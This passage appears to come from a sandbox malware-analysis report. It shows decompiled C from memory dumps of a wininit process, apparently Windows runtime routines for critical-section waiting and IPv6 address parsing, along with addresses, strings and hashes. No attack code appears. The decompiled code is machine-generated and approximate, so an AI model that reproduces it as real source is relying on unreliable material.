                                                							E02573F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
                                                							_t53 =  *_t85;
                                                							_t93 = _t92 + 0x20;
                                                							_t67 = _t67 + 1;
                                                							__eflags = _t53 - 0xffffffff;
                                                							if(_t53 != 0xffffffff) {
                                                								_t71 =  *((intOrPtr*)(_t53 + 0x14));
                                                								_a4 =  *((intOrPtr*)(_t53 + 0x14));
                                                							}
                                                							__eflags = _t67 - 2;
                                                							if(_t67 > 2) {
                                                								__eflags = _t85 - 0x26020c0;
                                                								if(_t85 != 0x26020c0) {
                                                									_t76 = _a4;
                                                									__eflags = _a4 - _a8;
                                                									if(__eflags == 0) {
                                                										E025A217A(_t71, __eflags, _t85);
                                                									}
                                                								}
                                                							}
                                                							_push("RTL: Re-Waiting\n");
                                                							_push(0);
                                                							_push(0x65);
                                                							_a8 = _a4;
                                                							E02573F92();
                                                							_t91 = _t93 + 0xc;
                                                							__eflags =  *0x7ffe0382;
                                                							if( *0x7ffe0382 != 0) {
                                                								goto L21;
                                                							}
                                                						}
                                                						goto L36;
                                                					}
                                                				} else {
                                                					return _t40;
                                                				}
                                                				L36:
                                                			}

                                                Strings
                                                • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0258248D
                                                • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 025824BD
                                                • RTL: Re-Waiting, xrefs: 025824FA
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.692498053.0000000002510000.00000040.00000001.sdmp, Offset: 02500000, based on PE: true
                                                • Associated: 00000007.00000002.692491544.0000000002500000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692568531.00000000025F0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692576573.0000000002600000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692583760.0000000002604000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692590055.0000000002607000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692596321.0000000002610000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692632305.0000000002670000.00000040.00000001.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2500000_wininit.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                • API String ID: 0-3177188983
                                                • Opcode ID: 1d87ac645c18cdeb04f26f4acf7c29ed5c40bd7626a2c5d68a4235235f30aa33
                                                • Instruction ID: 5c0cc0a8527a13f7d7747b01e0e16b5d38214663660c9abb7f14980bb9004a72
                                                • Opcode Fuzzy Hash: 1d87ac645c18cdeb04f26f4acf7c29ed5c40bd7626a2c5d68a4235235f30aa33
                                                • Instruction Fuzzy Hash: CC41F670600205BBD720EB64CC89F6A7BA9BF85724F208A05F955EB2D0D774E941CB68
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0255FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				signed int _v16;
                                                				signed int _v20;
                                                				signed int _v24;
                                                				signed int _v28;
                                                				signed int _t98;   /* used at the memmove offset computation below; declaration missing in the decompiler output */
                                                				signed int _t105;
                                                				void* _t110;
                                                				char _t114;
                                                				short _t115;
                                                				void* _t118;
                                                				signed short* _t119;
                                                				short _t120;
                                                				char _t122;
                                                				void* _t127;
                                                				void* _t130;
                                                				signed int _t136;
                                                				intOrPtr _t143;
                                                				signed int _t158;
                                                				signed short* _t164;
                                                				signed int _t167;
                                                				void* _t170;
                                                
                                                				_t158 = 0;
                                                				_t164 = _a4;
                                                				_v20 = 0;
                                                				_v24 = 0;
                                                				_v8 = 0;
                                                				_v12 = 0;
                                                				_v16 = 0;
                                                				_v28 = 0;
                                                				_t136 = 0;
                                                				while(1) {
                                                					_t167 =  *_t164 & 0x0000ffff;
                                                					if(_t167 == _t158) {
                                                						break;
                                                					}
                                                					_t118 = _v20 - _t158;
                                                					if(_t118 == 0) {
                                                						if(_t167 == 0x3a) {
                                                							if(_v12 > _t158 || _v8 > _t158) {
                                                								break;
                                                							} else {
                                                								_t119 =  &(_t164[1]);
                                                								if( *_t119 != _t167) {
                                                									break;
                                                								}
                                                								_t143 = 2;
                                                								 *((short*)(_a12 + _t136 * 2)) = 0;
                                                								_v28 = 1;
                                                								_v8 = _t143;
                                                								_t136 = _t136 + 1;
                                                								L47:
                                                								_t164 = _t119;
                                                								_v20 = _t143;
                                                								L14:
                                                								if(_v24 == _t158) {
                                                									L19:
                                                									_t164 =  &(_t164[1]);
                                                									_t158 = 0;
                                                									continue;
                                                								}
                                                								if(_v12 == _t158) {
                                                									if(_v16 > 4) {
                                                										L29:
                                                										return 0xc000000d;
                                                									}
                                                									_t120 = E0255EE02(_v24, _t158, 0x10);
                                                									_t170 = _t170 + 0xc;
                                                									 *((short*)(_a12 + _t136 * 2)) = _t120;
                                                									_t136 = _t136 + 1;
                                                									goto L19;
                                                								}
                                                								if(_v16 > 3) {
                                                									goto L29;
                                                								}
                                                								_t122 = E0255EE02(_v24, _t158, 0xa);
                                                								_t170 = _t170 + 0xc;
                                                								if(_t122 > 0xff) {
                                                									goto L29;
                                                								}
                                                								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
                                                								goto L19;
                                                							}
                                                						}
                                                						L21:
                                                						if(_v8 > 7 || _t167 >= 0x80) {
                                                							break;
                                                						} else {
                                                							if(E0255685D(_t167, 4) == 0) {
                                                								if(E0255685D(_t167, 0x80) != 0) {
                                                									if(_v12 > 0) {
                                                										break;
                                                									}
                                                									_t127 = 1;
                                                									_a7 = 1;
                                                									_v24 = _t164;
                                                									_v20 = 1;
                                                									_v16 = 1;
                                                									L36:
                                                									if(_v20 == _t127) {
                                                										goto L19;
                                                									}
                                                									_t158 = 0;
                                                									goto L14;
                                                								}
                                                								break;
                                                							}
                                                							_a7 = 0;
                                                							_v24 = _t164;
                                                							_v20 = 1;
                                                							_v16 = 1;
                                                							goto L19;
                                                						}
                                                					}
                                                					_t130 = _t118 - 1;
                                                					if(_t130 != 0) {
                                                						if(_t130 == 1) {
                                                							goto L21;
                                                						}
                                                						_t127 = 1;
                                                						goto L36;
                                                					}
                                                					if(_t167 >= 0x80) {
                                                						L7:
                                                						if(_t167 == 0x3a) {
                                                							_t158 = 0;
                                                							if(_v12 > 0 || _v8 > 6) {
                                                								break;
                                                							} else {
                                                								_t119 =  &(_t164[1]);
                                                								if( *_t119 != _t167) {
                                                									_v8 = _v8 + 1;
                                                									L13:
                                                									_v20 = _t158;
                                                									goto L14;
                                                								}
                                                								if(_v28 != 0) {
                                                									break;
                                                								}
                                                								_v28 = _v8 + 1;
                                                								_t143 = 2;
                                                								_v8 = _v8 + _t143;
                                                								goto L47;
                                                							}
                                                						}
                                                						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
                                                							break;
                                                						} else {
                                                							_v12 = _v12 + 1;
                                                							_t158 = 0;
                                                							goto L13;
                                                						}
                                                					}
                                                					if(E0255685D(_t167, 4) != 0) {
                                                						_v16 = _v16 + 1;
                                                						goto L19;
                                                					}
                                                					if(E0255685D(_t167, 0x80) != 0) {
                                                						_v16 = _v16 + 1;
                                                						if(_v12 > 0) {
                                                							break;
                                                						}
                                                						_a7 = 1;
                                                						goto L19;
                                                					}
                                                					goto L7;
                                                				}
                                                				 *_a8 = _t164;
                                                				if(_v12 != 0) {
                                                					if(_v12 != 3) {
                                                						goto L29;
                                                					}
                                                					_v8 = _v8 + 1;
                                                				}
                                                				if(_v28 != 0 || _v8 == 7) {
                                                					if(_v20 != 1) {
                                                						if(_v20 != 2) {
                                                							goto L29;
                                                						}
                                                						 *((short*)(_a12 + _t136 * 2)) = 0;
                                                						L65:
                                                						_t105 = _v28;
                                                						if(_t105 != 0) {
                                                							_t98 = (_t105 - _v8) * 2; // 0x11
                                                							E02538980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
                                                							_t110 = 8;
                                                							E0252DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
                                                						}
                                                						return 0;
                                                					}
                                                					if(_v12 != 0) {
                                                						if(_v16 > 3) {
                                                							goto L29;
                                                						}
                                                						_t114 = E0255EE02(_v24, 0, 0xa);
                                                						_t170 = _t170 + 0xc;
                                                						if(_t114 > 0xff) {
                                                							goto L29;
                                                						}
                                                						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
                                                						goto L65;
                                                					}
                                                					if(_v16 > 4) {
                                                						goto L29;
                                                					}
                                                					_t115 = E0255EE02(_v24, 0, 0x10);
                                                					_t170 = _t170 + 0xc;
                                                					 *((short*)(_a12 + _t136 * 2)) = _t115;
                                                					goto L65;
                                                				} else {
                                                					goto L29;
                                                				}
                                                			}
                                                0x0255fcd1
                                                0x0255fcd6
                                                0x0255fcd9
                                                0x0255fcdc
                                                0x0255fcdf
                                                0x0255fce2
                                                0x0255fce5
                                                0x0255fce8
                                                0x0255fceb
                                                0x0255fced
                                                0x0255fced
                                                0x0255fcf3
                                                0x00000000
                                                0x00000000
                                                0x0255fcfc
                                                0x0255fcfe
                                                0x0255fdc1
                                                0x0258ecbd
                                                0x00000000
                                                0x0258eccc
                                                0x0258eccc
                                                0x0258ecd2
                                                0x00000000
                                                0x00000000
                                                0x0258ecdf
                                                0x0258ece0
                                                0x0258ece4
                                                0x0258eceb
                                                0x0258ecee
                                                0x0258eca8
                                                0x0258eca8
                                                0x0258ecaa
                                                0x0255fd76
                                                0x0255fd79
                                                0x0255fdb4
                                                0x0255fdb5
                                                0x0255fdb6
                                                0x00000000
                                                0x0255fdb6
                                                0x0255fd7e
                                                0x0258ecfc
                                                0x0255fe2f
                                                0x00000000
                                                0x0255fe2f
                                                0x0258ed08
                                                0x0258ed0f
                                                0x0258ed17
                                                0x0258ed1b
                                                0x00000000
                                                0x0258ed1b
                                                0x0255fd88
                                                0x00000000
                                                0x00000000
                                                0x0255fd94
                                                0x0255fd99
                                                0x0255fda1
                                                0x00000000
                                                0x00000000
                                                0x0255fdb0
                                                0x00000000
                                                0x0255fdb0
                                                0x0258ecbd
                                                0x0255fdc7
                                                0x0255fdcb
                                                0x00000000
                                                0x0255fdd7
                                                0x0255fde3
                                                0x0255fe06
                                                0x02571fe7
                                                0x00000000
                                                0x00000000
                                                0x02571fef
                                                0x02571ff0
                                                0x02571ff4
                                                0x02571ff7
                                                0x02571ffa
                                                0x02571ffd
                                                0x02572000
                                                0x00000000
                                                0x00000000
                                                0x0258ecf1
                                                0x00000000
                                                0x0258ecf1
                                                0x00000000
                                                0x0255fe06
                                                0x0255fde8
                                                0x0255fdec
                                                0x0255fdef
                                                0x0255fdf2
                                                0x00000000
                                                0x0255fdf2
                                                0x0255fdcb
                                                0x0255fd04
                                                0x0255fd05
                                                0x0258ec67
                                                0x00000000
                                                0x00000000
                                                0x0258ec6f
                                                0x00000000
                                                0x0258ec6f
                                                0x0255fd13
                                                0x0255fd3c
                                                0x0255fd40
                                                0x0258ec75
                                                0x0258ec7a
                                                0x00000000
                                                0x0258ec8a
                                                0x0258ec8a
                                                0x0258ec90
                                                0x0258ecb2
                                                0x0255fd73
                                                0x0255fd73
                                                0x00000000
                                                0x0255fd73
                                                0x0258ec95
                                                0x00000000
                                                0x00000000
                                                0x0258eca1
                                                0x0258eca4
                                                0x0258eca5
                                                0x00000000
                                                0x0258eca5
                                                0x0258ec7a
                                                0x0255fd4a
                                                0x00000000
                                                0x0255fd6e
                                                0x0255fd6e
                                                0x0255fd71
                                                0x00000000
                                                0x0255fd71
                                                0x0255fd4a
                                                0x0255fd21
                                                0x0256a3a1
                                                0x00000000
                                                0x0256a3a1
                                                0x0255fd36
                                                0x0257200b
                                                0x02572012
                                                0x00000000
                                                0x00000000
                                                0x02572018
                                                0x00000000
                                                0x02572018
                                                0x00000000
                                                0x0255fd36
                                                0x0255fe0f
                                                0x0255fe16
                                                0x0256a3ad
                                                0x00000000
                                                0x00000000
                                                0x0256a3b3
                                                0x0256a3b3
                                                0x0255fe1f
                                                0x0258ed25
                                                0x0258ed86
                                                0x00000000
                                                0x00000000
                                                0x0258ed91
                                                0x0258ed95
                                                0x0258ed95
                                                0x0258ed9a
                                                0x0258edad
                                                0x0258edb3
                                                0x0258edba
                                                0x0258edc4
                                                0x0258edc9
                                                0x00000000
                                                0x0258edcc
                                                0x0258ed2a
                                                0x0258ed55
                                                0x00000000
                                                0x00000000
                                                0x0258ed61
                                                0x0258ed66
                                                0x0258ed6e
                                                0x00000000
                                                0x00000000
                                                0x0258ed7d
                                                0x00000000
                                                0x0258ed7d
                                                0x0258ed30
                                                0x00000000
                                                0x00000000
                                                0x0258ed3c
                                                0x0258ed43
                                                0x0258ed4b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.692498053.0000000002510000.00000040.00000001.sdmp, Offset: 02500000, based on PE: true
                                                • Associated: 00000007.00000002.692491544.0000000002500000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692568531.00000000025F0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692576573.0000000002600000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692583760.0000000002604000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692590055.0000000002607000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692596321.0000000002610000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.692632305.0000000002670000.00000040.00000001.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2500000_wininit.jbxd
                                                Similarity
                                                • API ID: __fassign
                                                • String ID:
                                                • API String ID: 3965848254-0
                                                • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                • Instruction ID: e27198eef08e30e253ea7af0f815196201407a73395ac31f6307a5a6a2b3e13d
                                                • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                • Instruction Fuzzy Hash: DF91BF31D0022AEBDF25DF98C8557AEBBB8FF82308F20846BD805B7551E7705A45CB99
                                                Uniqueness

                                                Uniqueness Score: -1.00%